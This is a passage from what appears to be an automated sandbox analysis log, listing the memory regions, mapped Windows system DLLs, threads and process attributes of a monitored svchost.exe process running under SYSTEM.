0x7fffbad10000 end_va = 0x7fffbadc7fff monitored = 0 entry_point = 0x7fffbad1d870 region_type = mapped_file name = "windows.networking.connectivity.dll" filename = "\\Windows\\System32\\Windows.Networking.Connectivity.dll" (normalized: "c:\\windows\\system32\\windows.networking.connectivity.dll") Region: id = 4783 start_va = 0x7fffbf980000 end_va = 0x7fffbf98ffff monitored = 0 entry_point = 0x7fffbf9815e0 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 4784 start_va = 0x7fffc6f30000 end_va = 0x7fffc7085fff monitored = 0 entry_point = 0x7fffc6f5b240 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 4785 start_va = 0x7fffc9590000 end_va = 0x7fffc95cafff monitored = 0 entry_point = 0x7fffc959a620 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 4786 start_va = 0x7fffcb790000 end_va = 0x7fffcb798fff monitored = 0 entry_point = 0x7fffcb792020 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4787 start_va = 0x7fffb1820000 end_va = 0x7fffb1830fff monitored = 0 entry_point = 0x7fffb1826910 region_type = mapped_file name = "dusmapi.dll" filename = "\\Windows\\System32\\dusmapi.dll" (normalized: "c:\\windows\\system32\\dusmapi.dll") Region: id = 4788 start_va = 0x7fffbe720000 end_va = 0x7fffbe756fff monitored = 0 entry_point = 0x7fffbe73ff00 region_type = mapped_file name = "updatepolicy.dll" filename = "\\Windows\\System32\\updatepolicy.dll" (normalized: "c:\\windows\\system32\\updatepolicy.dll") Region: id = 4789 start_va = 0x7fffc37f0000 end_va = 0x7fffc3818fff monitored = 0 entry_point = 0x7fffc37f9320 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 4790 start_va = 0x7fffc35f0000 end_va = 0x7fffc3682fff monitored = 0 entry_point = 0x7fffc35f9e10 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 4791 start_va = 0x7fffbe760000 end_va = 0x7fffbe822fff monitored = 0 entry_point = 0x7fffbe76e000 region_type = mapped_file name = "windows.web.dll" filename = "\\Windows\\System32\\Windows.Web.dll" (normalized: "c:\\windows\\system32\\windows.web.dll") Region: id = 4792 start_va = 0x7fffc1960000 end_va = 0x7fffc1c0dfff monitored = 0 entry_point = 0x7fffc19969a0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 4793 start_va = 0x1fc0000 end_va = 0x20bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001fc0000" filename = "" Thread: id = 376 os_tid = 0x1598 Thread: id = 377 os_tid = 0x6b4 Thread: id = 378 os_tid = 0x1250 Thread: id = 379 os_tid = 0x1264 Thread: id = 380 os_tid = 0x16c0 Thread: id = 395 os_tid = 0x1758 Process: id = "20" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x38b31000" os_pid = "0x1190" os_integrity_level = "0x4000" os_privileges = "0x20800080" monitor_reason = "rpc_server" parent_id = "16" os_parent_pid = "0x264" cmd_line = "C:\\Windows\\system32\\svchost.exe -k wusvcs -p" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "S-1-5-80-2169053098-454685327-3448947123-3791923320-414336915" [0xe], "NT AUTHORITY\\Logon Session 00000000:000c126f" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 4636 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4637 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 4638 start_va = 0x30000 end_va = 0x4cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4639 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 4640 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 4641 start_va = 0xe0000 end_va = 0xe0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 4642 start_va = 0xf0000 end_va = 0xf8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 4643 start_va = 0x100000 end_va = 0x1c8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4644 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 4645 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 4646 start_va = 0x1f0000 end_va = 0x1f8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 4647 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4648 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4649 start_va = 0x600000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 4650 start_va = 0x680000 end_va = 0x87ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 4651 start_va = 0x880000 end_va = 0x887fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 4652 start_va = 0x890000 end_va = 0xa10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000890000" filename = "" Region: id = 4653 start_va = 0xa20000 end_va = 0xae0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a20000" filename = "" Region: id = 4654 start_va = 0xaf0000 end_va = 0xaf0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 4655 start_va = 0xb00000 end_va = 0xb08fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b00000" filename = "" Region: id = 4656 start_va = 0xb10000 end_va = 0xb10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b10000" filename = "" Region: id = 4657 start_va = 0xb20000 end_va = 0xb20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b20000" filename = "" Region: id = 4658 start_va = 0xb30000 end_va = 0xb30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b30000" filename = "" Region: id = 4659 start_va = 0xb50000 end_va = 0xb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b50000" filename = "" Region: id = 4660 start_va = 0xb60000 end_va = 0xb60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b60000" filename = "" Region: id = 4661 start_va = 0xb70000 end_va = 0xb99fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windows.web.dll.mui" filename = "\\Windows\\System32\\en-US\\Windows.Web.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\windows.web.dll.mui") Region: id = 4662 start_va = 0xba0000 end_va = 0xba4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 4663 start_va = 0xbb0000 end_va = 0xbbffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 4664 start_va = 0xbc0000 end_va = 0xbc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bc0000" filename = "" Region: id = 4665 start_va = 0xbd0000 end_va = 0xbd2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\System32\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mswsock.dll.mui") Region: id = 4666 start_va = 0xbf0000 end_va = 0xbf9fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\System32\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\crypt32.dll.mui") Region: id = 4667 start_va = 0xc00000 end_va = 0xdfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c00000" filename = "" Region: id = 4668 start_va = 0xe00000 end_va = 0xefffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e00000" filename = "" Region: id = 4669 start_va = 0xf00000 end_va = 0xffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f00000" filename = "" Region: id = 4670 start_va = 0x1000000 end_va = 0x10fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001000000" filename = "" Region: id = 4671 start_va = 0x1200000 end_va = 0x12fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 4672 start_va = 0x1300000 end_va = 0x1637fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4673 start_va = 0x1740000 end_va = 0x187efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 4674 start_va = 0x1880000 end_va = 0x1975fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernel32.dll.mui" filename = "\\Windows\\System32\\en-US\\kernel32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernel32.dll.mui") Region: id = 4675 start_va = 0x1980000 end_va = 0x19fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001980000" filename = "" Region: id = 4676 start_va = 0x1b00000 end_va = 0x1b00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b00000" filename = "" Region: id = 4677 start_va = 0x1c00000 end_va = 0x1dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c00000" filename = "" Region: id = 4678 start_va = 0x1e00000 end_va = 0x1ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e00000" filename = "" Region: id = 4679 start_va = 0x7ffe0000 end_va = 0x7ffe0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4680 start_va = 0x7ff4fde90000 end_va = 0x7ff4fdf8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff4fde90000" filename = "" Region: id = 4681 start_va = 0x7ff4fdf90000 end_va = 0x7ff5fdfaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff4fdf90000" filename = "" Region: id = 4682 start_va = 0x7ff5fdfb0000 end_va = 0x7ff5fffb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff5fdfb0000" filename = "" Region: id = 4683 start_va = 0x7ff5fffc0000 end_va = 0x7ff5fffc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffc0000" filename = "" Region: id = 4684 start_va = 0x7ff5fffd0000 end_va = 0x7ff5ffff2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff5fffd0000" filename = "" Region: id = 4685 start_va = 0x7ff612ac0000 end_va = 0x7ff612ad0fff monitored = 0 entry_point = 0x7ff612ac4e80 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 4686 start_va = 0x7fffa32a0000 end_va = 0x7fffa35cbfff monitored = 0 entry_point = 0x7fffa32a5160 region_type = mapped_file name = "certenroll.dll" filename = "\\Windows\\System32\\CertEnroll.dll" (normalized: "c:\\windows\\system32\\certenroll.dll") Region: id = 4687 start_va = 0x7fffa4080000 end_va = 0x7fffa414cfff monitored = 1 entry_point = 0x7fffa4082e40 region_type = mapped_file name = "certca.dll" filename = "\\Windows\\System32\\certca.dll" (normalized: "c:\\windows\\system32\\certca.dll") Region: id = 4688 start_va = 0x7fffa81e0000 end_va = 0x7fffa8396fff monitored = 0 entry_point = 0x7fffa830d5c0 region_type = mapped_file name = "enterprisecsps.dll" filename = "\\Windows\\System32\\enterprisecsps.dll" (normalized: "c:\\windows\\system32\\enterprisecsps.dll") Region: id = 4689 start_va = 0x7fffa8ea0000 end_va = 0x7fffa8efdfff monitored = 0 entry_point = 0x7fffa8ecea90 region_type = mapped_file name = "waasmedicsvc.dll" filename = "\\Windows\\System32\\WaaSMedicSvc.dll" (normalized: "c:\\windows\\system32\\waasmedicsvc.dll") Region: id = 4690 start_va = 0x7fffab850000 end_va = 0x7fffab8f6fff monitored = 0 entry_point = 0x7fffab855ca0 region_type = mapped_file name = "dmenrollengine.dll" filename = "\\Windows\\System32\\dmenrollengine.dll" (normalized: "c:\\windows\\system32\\dmenrollengine.dll") Region: id = 4691 start_va = 0x7fffab900000 end_va = 0x7fffab9aefff monitored = 0 entry_point = 0x7fffab919720 region_type = mapped_file name = "configmanager2.dll" filename = "\\Windows\\System32\\configmanager2.dll" (normalized: "c:\\windows\\system32\\configmanager2.dll") Region: id = 4692 start_va = 0x7fffabb10000 end_va = 0x7fffabb47fff monitored = 0 entry_point = 0x7fffabb30600 region_type = mapped_file name = "omadmapi.dll" filename = "\\Windows\\System32\\omadmapi.dll" (normalized: "c:\\windows\\system32\\omadmapi.dll") Region: id = 4693 start_va = 0x7fffabb50000 end_va = 0x7fffabba4fff monitored = 0 entry_point = 0x7fffabb79840 region_type = mapped_file name = "dmenterprisediagnostics.dll" filename = "\\Windows\\System32\\dmenterprisediagnostics.dll" (normalized: "c:\\windows\\system32\\dmenterprisediagnostics.dll") Region: id = 4694 start_va = 0x7fffabd60000 end_va = 0x7fffabd82fff monitored = 0 entry_point = 0x7fffabd72c30 region_type = mapped_file name = "waasassessment.dll" filename = "\\Windows\\System32\\WaaSAssessment.dll" (normalized: "c:\\windows\\system32\\waasassessment.dll") Region: id = 4695 start_va = 0x7fffad1b0000 end_va = 0x7fffad1cffff monitored = 0 entry_point = 0x7fffad1c2180 region_type = mapped_file name = "enterpriseresourcemanager.dll" filename = "\\Windows\\System32\\enterpriseresourcemanager.dll" (normalized: "c:\\windows\\system32\\enterpriseresourcemanager.dll") Region: id = 4696 start_va = 0x7fffb1820000 end_va = 0x7fffb1830fff monitored = 0 entry_point = 0x7fffb1826910 region_type = mapped_file name = "dusmapi.dll" filename = "\\Windows\\System32\\dusmapi.dll" (normalized: "c:\\windows\\system32\\dusmapi.dll") Region: id = 4697 start_va = 0x7fffb9c10000 end_va = 0x7fffb9c21fff monitored = 0 entry_point = 0x7fffb9c11450 region_type = mapped_file name = "taskschdps.dll" filename = "\\Windows\\System32\\TaskSchdPS.dll" (normalized: "c:\\windows\\system32\\taskschdps.dll") Region: id = 4698 start_va = 0x7fffb9e50000 end_va = 0x7fffb9e58fff monitored = 0 entry_point = 0x7fffb9e51380 region_type = mapped_file name = "dmiso8601utils.dll" filename = "\\Windows\\System32\\dmiso8601utils.dll" (normalized: "c:\\windows\\system32\\dmiso8601utils.dll") Region: id = 4699 start_va = 0x7fffbad10000 end_va = 0x7fffbadc7fff monitored = 0 entry_point = 0x7fffbad1d870 region_type = mapped_file name = "windows.networking.connectivity.dll" filename = "\\Windows\\System32\\Windows.Networking.Connectivity.dll" (normalized: "c:\\windows\\system32\\windows.networking.connectivity.dll") Region: id = 4700 start_va = 0x7fffbadd0000 end_va = 0x7fffbae0efff monitored = 0 entry_point = 0x7fffbadf7d00 region_type = mapped_file name = "wosc.dll" filename = "\\Windows\\System32\\wosc.dll" (normalized: "c:\\windows\\system32\\wosc.dll") Region: id = 4701 start_va = 0x7fffbaf60000 end_va = 0x7fffbaf74fff monitored = 0 entry_point = 0x7fffbaf62930 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 4702 start_va = 0x7fffbb010000 end_va = 0x7fffbb035fff monitored = 0 entry_point = 0x7fffbb0172c0 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 4703 start_va = 0x7fffbc1a0000 end_va = 0x7fffbc1abfff monitored = 0 entry_point = 0x7fffbc1a31c0 region_type = mapped_file name = "dmoleaututils.dll" filename = "\\Windows\\System32\\dmoleaututils.dll" (normalized: "c:\\windows\\system32\\dmoleaututils.dll") Region: id = 4704 start_va = 0x7fffbda80000 end_va = 0x7fffbda8efff monitored = 0 entry_point = 0x7fffbda85010 region_type = mapped_file name = "iri.dll" filename = "\\Windows\\System32\\iri.dll" (normalized: "c:\\windows\\system32\\iri.dll") Region: id = 4705 start_va = 0x7fffbe450000 end_va = 0x7fffbe534fff monitored = 0 entry_point = 0x7fffbe4dac50 region_type = mapped_file name = "flightsettings.dll" filename = "\\Windows\\System32\\FlightSettings.dll" (normalized: "c:\\windows\\system32\\flightsettings.dll") Region: id = 4706 start_va = 0x7fffbe610000 end_va = 0x7fffbe642fff monitored = 0 entry_point = 0x7fffbe62cfd0 region_type = mapped_file name = "dmcmnutils.dll" filename = "\\Windows\\System32\\dmcmnutils.dll" (normalized: "c:\\windows\\system32\\dmcmnutils.dll") Region: id = 4707 start_va = 0x7fffbe720000 end_va = 0x7fffbe756fff monitored = 0 entry_point = 0x7fffbe73ff00 region_type = mapped_file name = "updatepolicy.dll" filename = "\\Windows\\System32\\updatepolicy.dll" (normalized: "c:\\windows\\system32\\updatepolicy.dll") Region: id = 4708 start_va = 0x7fffbe760000 end_va = 0x7fffbe822fff monitored = 0 entry_point = 0x7fffbe76e000 region_type = mapped_file name = "windows.web.dll" filename = "\\Windows\\System32\\Windows.Web.dll" (normalized: "c:\\windows\\system32\\windows.web.dll") Region: id = 4709 start_va = 0x7fffbeb90000 end_va = 0x7fffbeb9bfff monitored = 0 entry_point = 0x7fffbeb91510 region_type = mapped_file name = "dsparse.dll" filename = "\\Windows\\System32\\dsparse.dll" (normalized: "c:\\windows\\system32\\dsparse.dll") Region: id = 4710 start_va = 0x7fffbf980000 end_va = 0x7fffbf98ffff monitored = 0 entry_point = 0x7fffbf9815e0 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 4711 start_va = 0x7fffbfbd0000 end_va = 0x7fffbfbd9fff monitored = 0 entry_point = 0x7fffbfbd14a0 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 4712 start_va = 0x7fffbfbe0000 end_va = 0x7fffbfc7cfff monitored = 0 entry_point = 0x7fffbfc14640 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 4713 start_va = 0x7fffbfed0000 end_va = 0x7fffbffd1fff monitored = 0 entry_point = 0x7fffbff157d0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 4714 start_va = 0x7fffc0000000 end_va = 0x7fffc000bfff monitored = 0 entry_point = 0x7fffc0001430 region_type = mapped_file name = "waasmedicps.dll" filename = "\\Windows\\System32\\WaaSMedicPS.dll" (normalized: "c:\\windows\\system32\\waasmedicps.dll") Region: id = 4715 start_va = 0x7fffc06c0000 end_va = 0x7fffc06dcfff monitored = 0 entry_point = 0x7fffc06c29b0 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 4716 start_va = 0x7fffc06e0000 end_va = 0x7fffc06fefff monitored = 0 entry_point = 0x7fffc06eeba0 region_type = mapped_file name = "dmxmlhelputils.dll" filename = "\\Windows\\System32\\dmxmlhelputils.dll" (normalized: "c:\\windows\\system32\\dmxmlhelputils.dll") Region: id = 4717 start_va = 0x7fffc07b0000 end_va = 0x7fffc07c6fff monitored = 0 entry_point = 0x7fffc07b24b0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 4718 start_va = 0x7fffc17b0000 end_va = 0x7fffc17bafff monitored = 0 entry_point = 0x7fffc17b1f70 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 4719 start_va = 0x7fffc1960000 end_va = 0x7fffc1c0dfff monitored = 0 entry_point = 0x7fffc19969a0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 4720 start_va = 0x7fffc31e0000 end_va = 0x7fffc31fffff monitored = 0 entry_point = 0x7fffc31e1630 region_type = mapped_file name = "dmcfgutils.dll" filename = "\\Windows\\System32\\dmcfgutils.dll" (normalized: "c:\\windows\\system32\\dmcfgutils.dll") Region: id = 4721 start_va = 0x7fffc35f0000 end_va = 0x7fffc3682fff monitored = 0 entry_point = 0x7fffc35f9e10 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 4722 start_va = 0x7fffc37f0000 end_va = 0x7fffc3818fff monitored = 0 entry_point = 0x7fffc37f9320 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 4723 start_va = 0x7fffc4610000 end_va = 0x7fffc464cfff monitored = 0 entry_point = 0x7fffc461b030 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 4724 start_va = 0x7fffc51c0000 end_va = 0x7fffc526bfff monitored = 0 entry_point = 0x7fffc51de600 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 4725 start_va = 0x7fffc5ea0000 end_va = 0x7fffc5ed5fff monitored = 0 entry_point = 0x7fffc5eaf5a0 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 4726 start_va = 0x7fffc6f30000 end_va = 0x7fffc7085fff monitored = 0 entry_point = 0x7fffc6f5b240 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 4727 start_va = 0x7fffc8120000 end_va = 0x7fffc8132fff monitored = 0 entry_point = 0x7fffc8123f60 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4728 start_va = 0x7fffc8320000 end_va = 0x7fffc8aa9fff monitored = 0 entry_point = 0x7fffc84dc050 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 4729 start_va = 0x7fffc8ac0000 end_va = 0x7fffc8ae2fff monitored = 0 entry_point = 0x7fffc8ac3700 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 4730 start_va = 0x7fffc9000000 end_va = 0x7fffc9032fff monitored = 0 entry_point = 0x7fffc9006930 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 4731 start_va = 0x7fffc9150000 end_va = 0x7fffc91e0fff monitored = 0 entry_point = 0x7fffc9175d30 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 4732 start_va = 0x7fffc9230000 end_va = 0x7fffc9263fff monitored = 0 entry_point = 0x7fffc9236e70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4733 start_va = 0x7fffc9270000 end_va = 0x7fffc9279fff monitored = 0 entry_point = 0x7fffc9271850 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 4734 start_va = 0x7fffc92d0000 end_va = 0x7fffc9359fff monitored = 0 entry_point = 0x7fffc9315870 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 4735 start_va = 0x7fffc9590000 end_va = 0x7fffc95cafff monitored = 0 entry_point = 0x7fffc959a620 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 4736 start_va = 0x7fffc95e0000 end_va = 0x7fffc96a9fff monitored = 0 entry_point = 0x7fffc960bc80 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 4737 start_va = 0x7fffc98a0000 end_va = 0x7fffc9909fff monitored = 0 entry_point = 0x7fffc98b0e90 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 4738 start_va = 0x7fffc9a70000 end_va = 0x7fffc9a87fff monitored = 0 entry_point = 0x7fffc9a74aa0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 4739 start_va = 0x7fffc9a90000 end_va = 0x7fffc9a9bfff monitored = 0 entry_point = 0x7fffc9a92200 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 4740 start_va = 0x7fffc9b80000 end_va = 0x7fffc9baafff monitored = 0 entry_point = 0x7fffc9b82db0 region_type = mapped_file name = "wldp.dll" filename = "\\Windows\\System32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll") Region: id = 4741 start_va = 0x7fffc9bb0000 end_va = 0x7fffc9beafff monitored = 0 entry_point = 0x7fffc9bb4000 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 4742 start_va = 0x7fffc9bf0000 end_va = 0x7fffc9c16fff monitored = 0 entry_point = 0x7fffc9bf6200 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 4743 start_va = 0x7fffc9d00000 end_va = 0x7fffc9d11fff monitored = 0 entry_point = 0x7fffc9d055f0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 4744 start_va = 0x7fffc9ec0000 end_va = 0x7fffc9eebfff monitored = 0 entry_point = 0x7fffc9ec7370 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 4745 start_va = 0x7fffc9f10000 end_va = 0x7fffc9f21fff monitored = 0 entry_point = 0x7fffc9f13e30 region_type = mapped_file name = "umpdc.dll" filename = "\\Windows\\System32\\umpdc.dll" (normalized: "c:\\windows\\system32\\umpdc.dll") Region: id = 4746 start_va = 0x7fffc9f30000 end_va = 0x7fffc9f7afff 